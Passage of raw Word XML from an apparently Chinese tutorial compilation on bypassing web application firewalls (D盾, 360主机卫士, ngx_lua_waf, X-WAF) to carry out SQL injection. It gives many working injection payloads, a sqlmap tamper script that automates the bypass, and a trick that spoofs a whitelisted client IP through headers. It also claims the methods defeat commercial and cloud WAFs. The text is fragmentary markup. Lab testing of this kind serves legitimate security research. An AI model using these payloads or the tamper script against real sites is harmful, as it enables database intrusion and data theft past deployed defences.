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680" w:firstLineChars="7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第二章:WAF Bypass实战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第一篇:Bypass D盾_IIS防火墙SQL注入防御(多姿势)</w:t>
      </w:r>
    </w:p>
    <w:p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教学网址：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"https://www.cnblogs.com/xiaozi/p/7357937.html"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xiaozi/p/7357937.html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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0X01 前言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D盾_IIS防火墙，目前只支持Win2003服务器，前阵子看见官方博客说D盾新版将近期推出，相信功能会更强大，这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略，如下图，主要防御GET/POST/COOKIE，文件允许白名单设置。构造不同的测试环境，IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL)，看到这边的策略，主要的测试思路：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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白名单   b、绕过union select或select from的检测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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2121535"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="19" name="图片 19" descr="屏幕截图 2025-01-16 195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5-01-16 19573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0X02 IIS+PHP+MYSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>: 搭建这个window2003+IIS+php+mysql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1135" cy="1529080"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="20" name="图片 20" descr="屏幕截图 2025-01-16 195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5-01-16 19593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绕过姿势一：白名单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PHP中的PATH_INFO问题，简单来说呢，就是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http:/x.x.x.x/3.php?id=1等价于      http://x.x.x.x/3.php/xxxxxxxxxxxxx?id=1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从白名单中随便挑个地址加在后面，可成功bypass，http://10.9.10.206/3.php/admin.php?id=1  union select 1,2,schema_name from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information_schema.SCHEMATA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经测试，GET、POST、COOKIE均有效，完全bypass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1963420"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="21" name="图片 21" descr="屏幕截图 2025-01-16 20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5-01-16 2001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绕过姿势二：空白字符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Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0；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测试了一下，基本上针对MSSQL的[0x01-0x20]都被处理了，唯独在Mysql中还有一个%a0可以利用，可以看到%a0与select合体，无法识别，从而绕过。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id=1  union%a0select 1,2,3 from admin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1693545"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="22" name="图片 22" descr="屏幕截图 2025-01-16 200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5-01-16 20023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绕过姿势三：\N形式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主要思考问题，如何绕过union select以及select from？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如果说上一个姿势是union和select之间的位置的探索，那么是否可以考虑在union前面进行检测呢？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为此在参数与union的位置，经测试，发现\N可以绕过union select检测，同样方式绕过select from的检测。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id=\Nunion(select 1,schema_name,\Nfrom information_schema.schemata)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58435" cy="1595120"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5080"/>
            <wp:docPr id="23" name="图片 23" descr="屏幕截图 2025-01-16 20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5-01-16 20030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IIS+ASP/ASPX+MSSQL：  搭建IIS+ASP/ASPX+MSSQL环境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1456055"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="24" name="图片 24" descr="屏幕截图 2025-01-16 20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5-01-16 2015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绕过姿势一：白名单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ASP： 不支持，找不到路径，而且D盾禁止执行带非法字符或特殊目录的脚本（/1.asp/x），撤底没戏了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　　 /admin.php/../1.asp?id=1 and 1=1    拦截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　　 /1.asp?b=admin.php&amp;id=1 and 1=1 拦截，可见D盾会识别到文件的位置，并不是只检测URL存在白名单那么简单了。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ASPX：与PHP类似  /1.aspx/admin.php?id=1   union select 1,'2',TABLE_NAME from INFORMATION_SCHEMA.TABLES 可成功bypass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1770" cy="2234565"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="25" name="图片 25" descr="屏幕截图 2025-01-16 20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5-01-16 20163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绕过姿势二：空白字符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　　Mssql可以利用的空白字符有：01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20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　　[0x01-0x20]全部都被处理了，想到mysql %a0的漏网之鱼是否可以利用一下?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ASP+MSSQL:  不支持%a0，已放弃。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ASPX+MSSQL: %a0+%0a配合，可成功绕过union select的检测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id=1 union%a0%0aselect 1,'2',TABLE_NAME %a0from INFORMATION_SCHEMA.TABLES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1610" cy="2199005"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="26" name="图片 26" descr="屏幕截图 2025-01-16 20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5-01-16 2017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绕过姿势三：1E形式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　　MSSQL属于强类型，这边的绕过是有限制，from前一位显示位为数字类型，这样才能用1efrom绕过select from。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="447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只与数据库有关，与语言无关，故ASP与ASPX一样，可bypass，id=1eunion select '1',TABLE_NAME,1efrom INFORMATION_SCHEMA.TABLES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1795145"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="27" name="图片 27" descr="屏幕截图 2025-01-16 20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5-01-16 20174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不同语言，中间件，数据库，所对应的特性有些差异，思路却一致，实践出真知，只要动手去探索，还有更多姿势等待被挖掘。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目前的测试成果，可成功bypass注入防御，如 安全狗、云锁、360主机卫士、D盾_IIS防火墙等主机防护软件及各种云waf，有些姿势都在用。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1440" w:firstLineChars="60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Bypass 360主机卫士SQL注入防御（多姿势）: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教学网址：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"https://www.cnblogs.com/xiaozi/p/9132737.html"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xiaozi/p/9132737.html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在服务器客户端领域，曾经出现过一款360主机卫士，目前已停止更新和维护，官网都打不开了，但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面，翻出了360主机卫士Apache版的安装包，就当做是一个纪念版吧。这边主要分享一下几种思路，Bypass 360主机卫士SQL注入防御。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9070" cy="1196975"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="28" name="图片 28" descr="屏幕截图 2025-01-16 20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5-01-16 2020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360主机卫士官网：http://zhuji.360.cn软件版本：360主机卫士Apache 纪念版测试环境：phpStudy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本地构造SQL注入点：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$id=_REQUEST['id'];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query = "SELECT * FROM admin WHERE id = $id ";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WAF测试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因zhuji.360.cn站点已关闭，拦截界面为空白，抓包先放一张拦截图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11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6513195" cy="2221230"/>
            <wp:effectExtent l="0" t="0" r="1905" b="7620"/>
            <wp:docPr id="3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3195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姿势一：网站后台白名单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在360主机卫士客户端设置中存在默认网站后台白名单，如图：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2245" cy="1965960"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="31" name="图片 31" descr="屏幕截图 2025-01-16 20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5-01-16 2024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利用PHP中的PATH_INFO问题，随便挑选一个白名单加在后面，可成功bypass。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/test.php/admin?id=1 union select 1,2,schema_name from information_schema.SCHEMATA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8595" cy="1632585"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
            <wp:docPr id="32" name="图片 32" descr="屏幕截图 2025-01-16 20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5-01-16 2025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姿势二：静态资源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当文件后缀名为js、jpg、png等静态资源后缀请求，类似白名单机制，waf为了检测效率，直接略过这样一些静态资源文件名后缀的请求。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/test.php/1.png?id=1 union select 1,2,schema_name from information_schema.SCHEMATA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5420" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="33" name="图片 33" descr="屏幕截图 2025-01-16 20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5-01-16 20260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姿势三：缓冲区溢出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当Post大包时，WAF在处理测试向量时超出了其缓冲区长度，超过检测内容长度将会直接Bypass，如果正常用户上传一些比较大的文件，WAF每个都检测的话，性能就会被耗光。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基于这些考虑，POST 大包溢出的思路可成功Bypass。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/test.php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POST：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id=1 and (select 1)=(Select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0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) union select 1,2,schema_name from information_schema.SCHEMATA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7325" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="34" name="图片 34" descr="屏幕截图 2025-01-16 20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5-01-16 20263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姿势四：uri参数溢出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这种溢出的形式，我称它为uri参数溢出。比如某WAF，默认情况下只能获取前100个参数进行检测，当提交第101个参数时，那么，将无法对攻击者提交的第100个以后的参数进行有效安全检测，从而绕过安全防御。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经测试，当提交的参数个数超过97个，可进行union select 查询，再增加对关键字from的绕过，可成功Bypass。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http://192.168.204.128/test.php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OST：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&amp;id=1 union select 1,2,schema_name %0a/!from/information_schema.SCHEMATA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5420" cy="2715895"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="35" name="图片 35" descr="屏幕截图 2025-01-16 20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5-01-16 2027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姿势五：GET+POST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一个历史久远的逻辑问题了，当同时提交GET、POST请求时，进入POST逻辑，而忽略了GET请求的有害参数输入,可轻易Bypass。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/test.php?id=1 union select 1,2,schema_name from information_schema.SCHEMATA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POST：aaa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675" cy="2233930"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="36" name="图片 36" descr="屏幕截图 2025-01-16 20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5-01-16 20275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姿势六：multipart/form-data格式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将Post、Get数据包转为上传multipart/form-data格式数据包，利用协议解析的差异，从而绕过SQL防御。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------WebKitFormBoundaryACZoaLJJzUwc4hYMContent-Disposition: form-data; name="id"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 union /* !select*/ 1,2,schema_name【这里使用Enter换行】from information_schema.SCHEMATA------WebKitFormBoundaryACZoaLJJzUwc4hYM--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如果转换数据包进行绕过呢？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首先，新建一个html页面：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&lt;html&gt;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&lt;head&gt;&lt;/head&gt;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&lt;body&gt;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&lt;form action="http://192.168.204.128/test.php"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method="post" enctype="multipart/form-data"&gt;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&lt;input type="text" name="id"&gt;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&lt;input type="submit"&gt;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&lt;/form&gt;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&lt;/body&gt;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&lt;/html&gt;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然后，在浏览器打开并在输入框中输入参数，抓包发送到Repeater，进一步构造Payload获取数据。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8595" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1270"/>
            <wp:docPr id="38" name="图片 38" descr="屏幕截图 2025-01-16 20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5-01-16 2029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姿势七：编码绕过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客户端对Payload进行编码，服务端能够自动进行解码，这时候就考验WAF的编码解码能力了，如果WAF不能进行有效解码还原攻击向量，可能导致绕过，常见编码如URL编码、unicode编码（IIS）、宽字节编码等。这个地方虽然URL编码也能绕过获取数据，主要是因为WAF对POST的防御规则太过于松散，union select 随便绕，select from 用%0a就可以解决，主要分享一下编码绕过的思路。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/test.php?id=1POST：id=1 %55nion %53elect/* !1,2,schema_name %0aFROM information_schema.SCHEMATA* /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5420" cy="2072640"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="39" name="图片 39" descr="屏幕截图 2025-01-16 20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5-01-16 2030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姿势八：%0a+内联注释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利用Mysql数据库的一些特性，绕过WAF的防御规则，最终在数据库中成功执行了SQL，获取数据。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http://192.168.204.128/test.php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POST：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id=1 union%0a/* !12345select* / 1,2,schema_name%0a/* !12345from */information_schema.SCHEMATA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1851660"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="40" name="图片 40" descr="屏幕截图 2025-01-16 20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5-01-16 20304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0x03 自动化Bypass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​ 当测试出绕过WAF SQL注入防御的技巧后，可通过编写tamper脚本实现自动化注入，以姿势八：%0a+内联注释为例，主要是针对union select from等关键字替换，Payload中的部分关键字可能会被waf拦截，需要一步步调试，测试，总结规律。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tamper脚本：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#!/usr/bin/env python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"""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write by Bypass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"""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from lib.core.enums import PRIORITY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from lib.core.settings import UNICODE_ENCODING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__priority__ = PRIORITY.LOW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def dependencies():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pass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def tamper(payload, **kwargs):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"""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Replaces keywords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&gt;&gt;&gt; tamper('UNION SELECT id FROM users')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'union%0a/*!12345select*/id%0a/*!12345from*/users'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"""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if payload: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payload=payload.replace(" ALL SELECT ","%0a/*!12345select*/")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payload=payload.replace("UNION SELECT","union%0a/*!12345select*/")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payload=payload.replace(" FROM ","%0a/*!12345from*/")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payload=payload.replace("CONCAT","CONCAT%23%0a")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payload=payload.replace("CASE ","CASE%23%0a")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payload=payload.replace("CAST(","/*!12345CASt(*/")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payload=payload.replace("DATABASE()","database%0a()")     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return payload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加载tamper脚本，可成功获取数据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3094355"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1270"/>
            <wp:docPr id="41" name="图片 41" descr="屏幕截图 2025-01-16 203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5-01-16 2032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这边也分享一下，另一个比较简单的自动化注入的方法，就是使用超级SQL注入工具，利用这边提供的注入绕过模块，结合日志中心的测试记录，可以很方便的进行调试，然后保存绕过模板，方便下次调用。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675" cy="2146935"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715"/>
            <wp:docPr id="42" name="图片 42" descr="屏幕截图 2025-01-16 20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截图 2025-01-16 20324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利用前面的关键字符进行替换，自动化注入获取数据库数据：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1880870"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:docPr id="43" name="图片 43" descr="屏幕截图 2025-01-16 20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截图 2025-01-16 2033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​ 分享了几种有意思的绕过思路，主要利用了WAF层的逻辑问题，数据库层的一些特性，服务器层编码解析、参数获取的差异。其中借鉴和学习了不少前辈们的思路，受益匪浅，学习，沉淀，总结，分享，周而复始。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Bypass ngx_lua_waf SQL注入防御（多姿势）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>教学网址：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"https://www.cnblogs.com/xiaozi/p/9138126.html"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xiaozi/p/9138126.html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ngx_lua_waf是一款基于ngx_lua的web应用防火墙，使用简单，高性能、轻量级。默认防御规则在wafconf目录中，摘录几条核心的SQL注入防御规则：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select.+(from|limit)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(?:(union(.*?)select))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(?:from\W+information_schema\W)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这边主要分享三种另类思路，Bypass ngx_lua_waf SQL注入防御。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0x01 环境搭建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github源码：https://github.com/loveshell/ngx_lua_waf/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ngx_lua_waf安装部署，设置反向代理访问构造的SQL注入点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0x02 WAF测试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ngx_lua_waf是基于ngx_lua的，我们先通过一个测试用例来了解它是如何获取参数的。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首先看一下官方 API 文档，获取一个 uri 有两个方法：ngx.req.get_uri_args、ngx.req.get_post_args，二者主要的区别是参数来源有区别，ngx.req.get_uri_args获取 uri 请求参数，ngx.req.get_post_args获取来自 post 请求内容。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server {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listen    80;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server_name  localhost;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location /test {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content_by_lua_block {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local arg = ngx.req.get_uri_args()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for k,v in pairs(arg) do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    ngx.say("[GET ] key:", k, " v:", v)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end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ngx.req.read_body()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local arg = ngx.req.get_post_args()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for k,v in pairs(arg) do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    ngx.say("[POST] key:", k, " v:", v)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    end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    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  }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 xml:space="preserve">    结果：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205865"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="44" name="图片 44" descr="屏幕截图 2025-01-16 20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截图 2025-01-16 20380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通过这个测试，我们可以发现：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1、当提交同一参数id，根据接收参数的顺序进行排序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2、当参数id，进行大小写变换，如变形为Id、iD、ID，则会被当做不同的参数，大小写敏感。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我们知道，window下IIS+ASP/ASPX 大小写是不敏感的，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提交参数为： ?id=1&amp;Id=2&amp;iD=3&amp;ID=4，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输出结果为：1, 2, 3, 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那么，当nginx反向代理到IIS服务器的时候，这就存在一个参数获取的差异，结合HPP进行利用，可被用来进行Bypass ngx_lua 构建的SQL注入防御。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绕过姿势一：参数大小写+HPP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http://192.168.8.147/test/sql.aspx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?id=1 UNION/&amp;ID=/SELECT null,name,null/&amp;Id=/FROM master.dbo.sysdatabases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865" cy="1869440"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
            <wp:docPr id="45" name="图片 45" descr="屏幕截图 2025-01-16 203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屏幕截图 2025-01-16 2039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绕过姿势二：GPC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在ASPX中，有一个比较特殊的HPP特性，当GET/POST/COOKIE同时提交的参数id，服务端接收参数id的顺序GET,POST,COOKIE，中间通过逗号链接，于是就有了这个idea。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UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置，通过ASPX的这个特性连起来，堪称完美的一个姿势，压根不好防。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但姿势利用太过于局限： 使用Request.Params["id"]来获取参数,GPC获取到参数拼接起来，仅仅作为Bypass分享一种思路而已。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4150" cy="2068195"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="46" name="图片 46" descr="屏幕截图 2025-01-16 20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5-01-16 20394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绕过姿势三：uri参数溢出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前面两种都是MSSQL的Bypass，而且利用姿势还有一定的极限，有没有那么一种可以Bypass Mysql，又可以Bypass MSSQL，完全无视SQL注入防御，为所欲为的姿势呢？这就是接下来的终极大招了。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默认情况下，通过ngx.req.get_uri_args、ngx.req.get_post_args获取uri参数，只能获取前100个参数，当提交第101个参数时，uri参数溢出，无法正确获取第100以后的参数值，基于ngx_lua开发的安全防护，无法对攻击者提交的第100个以后的参数进行有效安全检测，从而绕过安全防御。具体分析详见我写的另一篇文章：《打破基于OpenResty的WEB安全防护（CVE-2018-9230）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Mysql Bypass实例：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1395730"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="47" name="图片 47" descr="屏幕截图 2025-01-16 20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屏幕截图 2025-01-16 2040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Mssql Bypass实例：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2245" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="48" name="图片 48" descr="屏幕截图 2025-01-16 20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屏幕截图 2025-01-16 20404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这三种姿势主要利用HPP，结合参数获取的特性和差异，从而绕过ngx_lua_waf的SQL注入防御。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不同语言、中间件、数据库，所对应的特性是有差异的，而这些差异在某些特定的场景下，是可以利用的。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960" w:firstLineChars="4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Bypass X-WAF SQL注入防御（多姿势）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教学网址：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"https://www.cnblogs.com/xiaozi/p/9132409.html"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xiaozi/p/9132409.html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0x00 前言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​ X-WAF是一款适用中、小企业的云WAF系统，让中、小企业也可以非常方便地拥有自己的免费云WAF。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​ 本文从代码出发，一步步理解WAF的工作原理，多姿势进行WAF Bypass。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0x01 环境搭建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官网：https://waf.xsec.io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github源码：https://github.com/xsec-lab/x-waf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X-WAF下载安装后，设置反向代理访问构造的SQL注入点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0x02 代码分析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首先看一下整体的目录结构，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nginx_conf 目录为参考配置（可删除），rules目录存放过滤规则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init.lua 加载规则，access.lua 程序启动，config.lua 配置文件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主要逻辑实现全部在util.lua和waf.lua文件。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325" cy="1634490"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="49" name="图片 49" descr="屏幕截图 2025-01-16 21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屏幕截图 2025-01-16 2100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代码逻辑很简单，先熟悉一下检测流程，程序入口在waf.lua 第262-274行中：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-- waf start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function _M.check()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_M.white_ip_check()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elseif _M.black_ip_check()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elseif _M.user_agent_attack_check()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elseif _M.white_url_check()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elseif _M.url_attack_check()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elseif _M.cc_attack_check()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elseif _M.cookie_attack_check()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elseif _M.url_args_attack_check()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elseif _M.post_attack_check()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else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return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这个一个多条件判断语句，一旦满足前面的条件就不再进行后面的检测。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白名单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首先判断IP白名单,我们来看一下white_ip_check()函数,同文件下的第50-64行：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-- white ip check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function _M.white_ip_check()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config.config_white_ip_check == "on" then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local IP_WHITE_RULE = _M.get_rule('whiteip.rule')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local WHITE_IP = util.get_client_ip()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if IP_WHITE_RULE ~= nil then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for _, rule in pairs(IP_WHITE_RULE) do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if rule ~= "" and rulematch(WHITE_IP, rule, "jo") then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util.log_record(config.config_log_dir, 'White_IP', ngx.var_request_uri, "", "")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return true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end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end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end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默认配置IP白名单是开启状态，读取IP白名单规则与获取的客户端IP进行比对，我们再来跟进看一下get_client_ip()函数，在util.lua文件中，第83-96行：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-- Get the client IP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function _M.get_client_ip()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local CLIENT_IP = ngx.req.get_headers()["X_real_ip"]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CLIENT_IP == nil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CLIENT_IP = ngx.req.get_headers()["X_Forwarded_For"]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CLIENT_IP == nil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CLIENT_IP = ngx.var.remote_addr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CLIENT_IP == nil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CLIENT_IP = ""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return CLIENT_IP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-- Get the client IP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function _M.get_client_ip()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local CLIENT_IP = ngx.req.get_headers()["X_real_ip"]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CLIENT_IP == nil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CLIENT_IP = ngx.req.get_headers()["X_Forwarded_For"]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CLIENT_IP == nil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CLIENT_IP = ngx.var.remote_addr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CLIENT_IP == nil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CLIENT_IP = ""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return CLIENT_IP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在这段获取客户端IP的代码中，获取的X_real_ip、X_Forwarded_For是用户可控的，存在客户端IP地址可伪造的风险。最后再来看一下，rules目录中whiteip.rule的默认配置：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[{"Id":74,"RuleType":"whiteip","RuleItem":"8.8.8.8"}]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IP白名单规则默认IP：8.8.8.8 为白名单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因此我们可以通过构造HTTP请求Header实现伪造IP来源为 8.8.8.8 ，从而绕过x-waf的所有安全防御。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Bypass 测试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先来一张拦截效果图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5420" cy="1275715"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
            <wp:docPr id="50" name="图片 50" descr="屏幕截图 2025-01-16 21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5-01-16 2102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伪造客户端IP绕过：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960" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="51" name="图片 51" descr="屏幕截图 2025-01-16 210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截图 2025-01-16 2103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另外有趣的是，在blackip.rule里面，把8.8.8.8放置在黑名单里面，但这并没有什么用，IP白名单已经跳出多条件判断，不会再进行IP黑名单检测。CC攻击的防御也主要是从客户端获取IP，也可以伪造客户端IP轻易绕过限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[{"Id":2,"RuleType":"blackip","RuleItem":"8.8.8.8"},{"Id":3,"RuleType":"blackip","RuleItem":"1.1.1.1"}]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同样来看一下url白名单white_url_check()函数：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function _M.white_url_check()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config.config_white_url_check == "on" then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local URL_WHITE_RULES = _M.get_rule('writeurl.rule')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local REQ_URI = ngx.var.request_uri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if URL_WHITE_RULES ~= nil then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for _, rule in pairs(URL_WHITE_RULES) do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if rule ~= "" and rulematch(REQ_URI, rule, "joi") then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return true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end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end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end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添加了一下URL白名单功能，感觉无效，对比了一下rules文件，可以发现加载的rule文件名不一致。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这里应该是作者的一个笔误，writeurl.rule和whiteUrl.rule。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1667510"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="52" name="图片 52" descr="屏幕截图 2025-01-16 21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5-01-16 2104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默认url白名单配置：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[{"Id":73,"RuleType":"whiteUrl","RuleItem":"/news/"}]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="480" w:firstLineChars="20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另外，这里使用ngx.re.find进行ngx.var.request_uri和rule匹配，只要url中存在/news/，就不进行检测，绕过安全防御规则。比如 : /test/sql,php/news/?id=1、/test/sql,php?id=1&amp;b=/news/ 等形式可绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="48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正则匹配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接下来，我们主要来看一下M.url_args_attack_check()、M.post_attack_check()：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`-- deny url args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function _M.url_args_attack_check()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config.config_url_args_check == "on"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local ARGS_RULES = _M.get_rule('args.rule')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for _, rule in pairs(ARGS_RULES) do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local REQ_ARGS = ngx.req.get_uri_args()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for key, val in pairs(REQ_ARGS) do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local ARGS_DATA = {}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if type(val) == 'table'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ARGS_DATA = table.concat(val, " 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else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ARGS_DATA = val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if ARGS_DATA and type(ARGS_DATA) ~= "boolean" and rule ~= "" and rulematch(unescape(ARGS_DATA), rule, "joi")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util.log_record(config.config_log_dir, 'Get_Attack', ngx.var.request_uri, "-", rule)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if config.config_waf_enable == "on"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util.waf_output()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return true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return false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-- deny post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function _M.post_attack_check()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if config.config_post_check == "on"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ngx.req.read_body()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local POST_RULES = _M.get_rule('post.rule')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for _, rule in pairs(POST_RULES) do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local POST_ARGS = ngx.req.get_post_args() or {}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for k, v in pairs(POST_ARGS) do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local post_data = ""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if type(v) == "table"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post_data = table.concat(v, ", ")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elseif type(v) == "boolean"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post_data = k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else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post_data = v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if rule ~= "" and rulematch(post_data, rule, "joi")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util.log_record(config.config_log_dir, 'Post_Attack', post_data, "-", rule)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if config.config_waf_enable == "on" then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util.waf_output()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return true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return false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end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两段函数在一定程度上是类似的，使用ngx.req.get_uri_args、ngx.req.get_post_args 获取数据来源，前者来自 uri 请求参数，而后者来自 post 请求内容，并未对数据进行特殊处理，然后都使用rulematch(data, rule, "joi")来进行匹配。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rule中比较关键SQL注入防御规则如下：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select.+(from|limit)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(?:(union(.*?)select))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(?:from\W+information_schema\W)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绕过姿势一：%0a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由于使用的是joi来修饰，我们可以用%0a来进行绕过。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/sql.php?id=1 union%0aselect 1,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schema_name,3%0afrom /!12345information_schema.schemata/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0340" cy="1611630"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:docPr id="53" name="图片 53" descr="屏幕截图 2025-01-16 21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5-01-16 2107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绕过姿势二：%u特性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主要利用IIS服务器支持unicode的解析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/sql.aspx?id=1 union selec%u0054 null,table_name,null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fro%u004d information_schema.tables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1610" cy="1489710"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="54" name="图片 54" descr="屏幕截图 2025-01-16 21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5-01-16 21075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绕过姿势三：HPP+GPC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使用GPC三种方式可以进行参数传递,利用apsx特性，将获取到参数拼接起来，可成功Bypass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/sql.aspx?id=1 union/*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POST:Id=2*/select null,system_user,null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4310" cy="2684145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="55" name="图片 55" descr="屏幕截图 2025-01-16 210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屏幕截图 2025-01-16 2108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​ 这是一款适合用来进行WAF Bypass练手的云WAF，通过代码层面熟悉WAF的工作原理，进一步理解和应用各种服务器特性、数据库特性来进行尝试Bypass。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720" w:firstLineChars="30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Bypass 护卫神SQL注入防御（多姿势）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教学网址：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"https://www.cnblogs.com/xiaozi/p/9138160.html"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xiaozi/p/9138160.html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0x00 前言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​　护卫神一直专注服务器安全领域， 其中有一款产品，护卫神·入侵防护系统 ，提供了一些网站安全防护的功能，在IIS加固模块中有一个SQL防注入功能。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这边主要分享一下几种思路，Bypass 护卫神SQL注入防御。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0x01 环境搭建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护卫神官网：http://www.huweishen.com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软件版本：护卫神·入侵防护系统 V3.8.1 最新版本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下载地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://down.huweishen.com/hws.zip" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://down.huweishen.com/hws.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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测试环境：IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL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040" cy="2733040"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
